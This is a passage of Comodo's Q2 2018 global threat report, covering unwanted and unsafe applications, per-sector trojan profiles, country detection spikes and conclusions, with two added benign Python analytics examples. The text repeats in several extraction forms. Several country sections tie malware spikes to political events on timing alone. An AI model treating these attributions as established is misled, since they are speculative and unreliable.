The unwanted application category is alarming because, in the course of ordinary computer and Internet use, users often install these applications inadvertently. Examples include common adware programs and widely disseminated images, videos, dialers, jokes, gossip, and more.

The most common unwanted application Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, modify the search provider, and/or perform other actions users might not have intended. The category also includes free toolbars, adware, and "system optimizers".

As the bubble chart shows, the US is far and away the most common country of detection for unwanted applications in Q2 2018, and the timeline shows that this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs that are in fact frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but do the opposite; examples include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application Comodo detected in Q2 2018 was AutoKMS, software used to "crack" or patch unregistered copies of Microsoft software. Such programs are referred to as "hacktools" and may be distributed with additional malware that users install inadvertently.

This malware type differs a bit in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively. The timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6 Vertical analysis

In this section we examine the unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses, and Worms. The diagram also lists the #1 malware family for each vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detections in not just one but multiple verticals, clearly making them a current strategic threat across the world.
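The profile in the infographic comes down to a count of detections per vertical, per malware type and per family. The following Python is an added example of that aggregation, not Comodo's code; its detection records are constructed, and every family name other than Zbot and Kryptik is a placeholder. It restricts each vertical to the four dangerous types named above, picks the top type and the #1 family within it, and then lists the families that top more than one vertical, which is the report's criterion for a strategic threat.

```python
"""Build a per-vertical malware profile from raw detection records.

Added example for section 6: the records are constructed and the
output is not Comodo's infographic. For each vertical it keeps only
the four dangerous types the report uses, picks the most-detected
type, then the most-detected family within that type, and finally
lists the families that top more than one vertical.
"""
from collections import Counter, defaultdict

DANGEROUS_TYPES = ("Backdoor", "Trojan", "Virus", "Worm")

# Constructed records: (vertical, malware type, family). Family names
# other than Zbot and Kryptik are placeholders, not real detections.
SAMPLE_DETECTIONS = [
    ("Government", "Trojan", "Zbot"), ("Government", "Trojan", "Zbot"),
    ("Government", "Trojan", "Zbot"), ("Government", "Trojan", "Kryptik"),
    ("Government", "Worm", "WormA"), ("Government", "Worm", "WormA"),
    ("Government", "Application", "DealPly"),      # low threat: ignored
    ("Transportation", "Trojan", "Zbot"), ("Transportation", "Trojan", "Zbot"),
    ("Transportation", "Backdoor", "BackdoorA"),
    ("Retail", "Trojan", "Kryptik"), ("Retail", "Trojan", "Kryptik"),
    ("Retail", "Virus", "VirusA"),
    ("Automotive", "Trojan", "Kryptik"), ("Automotive", "Trojan", "Kryptik"),
    ("Automotive", "Trojan", "Kryptik"), ("Automotive", "Worm", "WormA"),
    ("Automotive", "Worm", "WormA"),
]


def vertical_profiles(records, types=DANGEROUS_TYPES):
    """Return {vertical: {top_type, top_family, family_count, type_counts}}.

    Records whose type is not in `types` are dropped before counting, so
    low-threat Applications never influence a vertical's profile.
    """
    per_vertical = defaultdict(lambda: defaultdict(Counter))
    for vertical, mtype, family in records:
        if mtype in types:
            per_vertical[vertical][mtype][family] += 1

    profiles = {}
    for vertical, per_type in per_vertical.items():
        type_counts = {t: sum(c.values()) for t, c in per_type.items()}
        # Ties between types are broken alphabetically so output is stable.
        top_type = max(sorted(type_counts), key=type_counts.__getitem__)
        # Counter.most_common breaks family ties by first appearance.
        top_family, n = per_type[top_type].most_common(1)[0]
        profiles[vertical] = {
            "top_type": top_type,
            "top_family": top_family,
            "family_count": n,
            "type_counts": type_counts,
        }
    return profiles


def strategic_families(profiles):
    """Families that are the #1 family in more than one vertical."""
    tally = Counter(p["top_family"] for p in profiles.values())
    return sorted(f for f, n in tally.items() if n > 1)


if __name__ == "__main__":
    profiles = vertical_profiles(SAMPLE_DETECTIONS)
    for vertical, p in sorted(profiles.items()):
        print(f"{vertical:15} top type {p['top_type']:8} "
              f"#1 family {p['top_family']} ({p['family_count']})")
    print("strategic (top in >1 vertical):", strategic_families(profiles))
```

On the constructed records the Trojan type leads every vertical, Zbot tops Government and Transportation and Kryptik tops Retail and Automotive, so both come out as strategic families, mirroring the reasoning the report applies to its twenty-two verticals.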
First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now also has the ability to target email clients, file browsers, and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "clicker" to boost the hit count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", another name for the "Zeus" Trojan, which has been undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims the target's computer already has a virus and needs to be cleaned.

In conclusion, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Strategic analysis like this can be used to create a unique malware profile for each vertical and provide valuable cyber intelligence that clarifies the primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence
7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in spring 2018. The major spike on March 13 clearly stands out. What happened on that day in the US that might help explain the surge in malware activity? US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for the dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new collection requirements, many of them requests for information related to upcoming changes in US political, military, and intelligence activities, and immediately began to fulfill those requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.
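Each country write-up in this section reads a daily detection timeline and singles out its largest spike. The following Python is an added example of how to flag such days mechanically; it is not Comodo's code, and the daily counts in it are constructed, not Comodo telemetry. It scores each day against a trailing window using a median/MAD baseline (the window length, the threshold and the 1.4826 scaling constant are the example's own choices), and includes a mean/standard-deviation version for comparison to show why the robust baseline matters: once the big spike enters the window, the naive version no longer sees the smaller bump that follows it.

```python
"""Flag anomalous days in a daily malware-detection timeline.

Added example for the country timelines in section 7: the counts below
are constructed, not Comodo telemetry. Each day is scored against a
trailing window using the median and the median absolute deviation
(MAD), so a single extreme day does not inflate the baseline used to
judge the days that follow it.
"""
from datetime import date, timedelta
from statistics import mean, median, stdev

# Constructed sample: 20 days of roughly flat counts, a large spike at
# index 10 and a smaller bump at index 14 (counts are invented).
SAMPLE_COUNTS = [100, 104, 98, 101, 97, 103, 99, 102, 100, 98,
                 1200, 105, 101, 99, 140, 97, 103, 100, 98, 102]

MAD_TO_SIGMA = 1.4826  # scales MAD to a standard deviation for normal data


def robust_spikes(counts, window=7, threshold=5.0):
    """Return [(index, score)] for days whose robust z-score exceeds threshold.

    score = (count - median(base)) / (MAD_TO_SIGMA * MAD(base)), where base
    is the `window` days preceding the day under test. A flat baseline
    (MAD of 0) falls back to a scale of max(1, 10% of the median) so the
    score never divides by zero.
    """
    spikes = []
    for i in range(window, len(counts)):
        base = counts[i - window:i]
        centre = median(base)
        scale = MAD_TO_SIGMA * median(abs(v - centre) for v in base)
        if scale == 0:
            scale = max(1.0, 0.1 * centre)
        score = (counts[i] - centre) / scale
        if score > threshold:
            spikes.append((i, round(score, 2)))
    return spikes


def naive_spikes(counts, window=7, threshold=5.0):
    """Same test with mean and sample standard deviation, for comparison.

    One extreme day inside the window blows up the standard deviation,
    so a smaller bump that follows the big spike is missed.
    """
    spikes = []
    for i in range(window, len(counts)):
        base = counts[i - window:i]
        centre = mean(base)
        scale = stdev(base) or 1.0
        score = (counts[i] - centre) / scale
        if score > threshold:
            spikes.append((i, round(score, 2)))
    return spikes


def spike_report(counts, start_iso, **kwargs):
    """Map flagged indices to ISO dates: [(date, count, score)]."""
    start = date.fromisoformat(start_iso)
    return [((start + timedelta(days=i)).isoformat(), counts[i], score)
            for i, score in robust_spikes(counts, **kwargs)]


if __name__ == "__main__":
    for day, count, score in spike_report(SAMPLE_COUNTS, "2018-04-01"):
        print(f"{day}: {count} detections (robust z = {score})")
    print("naive method flags:", [i for i, _ in naive_spikes(SAMPLE_COUNTS)])
```

A flagged day is only a statistical anomaly in the sensor population. Before attributing it to a political event, as the paragraphs in this section do, a practitioner would check what the detections actually were (as the North Korea paragraph below does), whether sensor coverage or a signature update changed on that day, and whether the same spike shows up in other countries.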
7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. June 4 clearly stands out as the single most prominent day. The likely reason for this massive spike is that many intelligence services, both foreign and domestic, were busy trying to protect and/or collect sensitive information relating to current events within China. Why June 4? It is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea

National security events always attract the attention of professional hackers who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes coincided with the annual joint US-South Korean military exercises. This should come as little surprise in the Internet age, when everyone from students to soldiers, spies, and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.
7.4 North Korea

The chart shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May Comodo saw a spike of well over ten times the usual number of detections. One plausible explanation is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of a short period of political openness to connect better with the outside world. Comodo researched the detected malware further and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities, from social life to business, politics, and national security affairs, are now mostly performed online. This is especially true during a national crisis, when both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.
7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation aimed at controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: to gather, deny, or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart of Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out, and both might be associated with recent electoral events. In mid-April Iraq was preparing for a national election, which included the conundrum of how best to secure its electronic dimension. And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detections, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in the capital, Kyiv, on May 26.
7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it has been clear that cyberattacks can be used to punish not only individuals and enterprises but entire nations. In that context, the massive spike in malware detections in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
7.10 Finland, Russia, USA

Finally, let's look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day the press began to report that Donald Trump and Vladimir Putin would hold a summit in the Finnish capital, Helsinki. Geolocation of this virus activity in Finland revealed that it took place almost exclusively in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.
8 Conclusions

In Q2, Comodo Cybersecurity observed several significant new trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The increase in trojan malware last quarter means that the spread of malware in general will soon be amplified. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks to be revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in its delivery methods, more sophisticated in persistence, and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers, and the use of legitimate tools like PowerShell to attack are clear evidence of this increase in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and further mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and to store confidential information (such as messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. After a successful penetration, perpetrators profit by stealing money, selling confidential information, or blackmailing victims.

Moreover, given that the majority of trojans detected in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, changing the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies, and postures.
REQUEST A DEMO: Try Comodo Cybersecurity by speaking with a security consultant to begin the process of setting up a demo or proof-of-concept project. Contact us directly at +1 888-266-6361.

North America: Comodo Security Solutions Inc, 1255 Broad Street, Clifton, NJ 07013, United States. Tel +1 (888) 551 1531, Tel +1 (888) 266 6361, Int +1 (703) 581 6361, Fax +1 (973) 777 4394, sales@comodo.com
Europe: Comodo Security Solutions Inc, Șoseaua Națională 31, Iași 700237, Romania. Tel +40 332 806 772
Asia: Comodo Security Solutions Pvt Ltd, Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India. Tel +91 44 4562 2800, www.comodo.co.in

© 2018 All Rights Reserved, Comodo Security Solutions Inc. Visit comodo.com.
Comodo Threat Research Labs monitors, filters, and analyzes malware, ransomware, viruses, and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia, and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists, and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam, or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government, and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.
About Comodo Cybersecurity

Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates, and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network, and endpoint with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine, and the United Kingdom. For more information visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection – and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine’s Independence Day as well as Ukraine’s testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine’s capital city, Kyiv, on May 26.
7.9 Croatia
Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an “act of hostility.”
7.10 Finland, Russia, USA
Finally, let’s have a look at Comodo’s virus detections in Finland during Q2 2018. The largest single spike – by far – occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this virus activity in Finland revealed that it almost exclusively took place in Helsinki’s suburb of Vantaa – precisely where the summit was scheduled to take place.
8 Conclusions
In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence and much harder to detect by antivirus software. Propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.
Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, creating changes in the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies and postures.
About Comodo Cybersecurity
Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other “unknown” potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day.
The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL’s mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.
Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world’s largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world’s largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
5.4.1 Applications
Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.
In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a “Potentially Unwanted Application,” or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of applications.
And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.
5.4.2 Unwanted Applications
The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.
The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as “poor reputation” software that tries to install additional bundled software, modify the user homepage, modify the search provider and/or perform other actions users might not have intended. Such programs include free toolbars, adware and “system optimizers.”
As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.
And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications
Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.
The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to “crack” or patch unregistered copies of Microsoft software. These are referred to as “hacktools” and may be distributed with additional malware that users can install inadvertently.
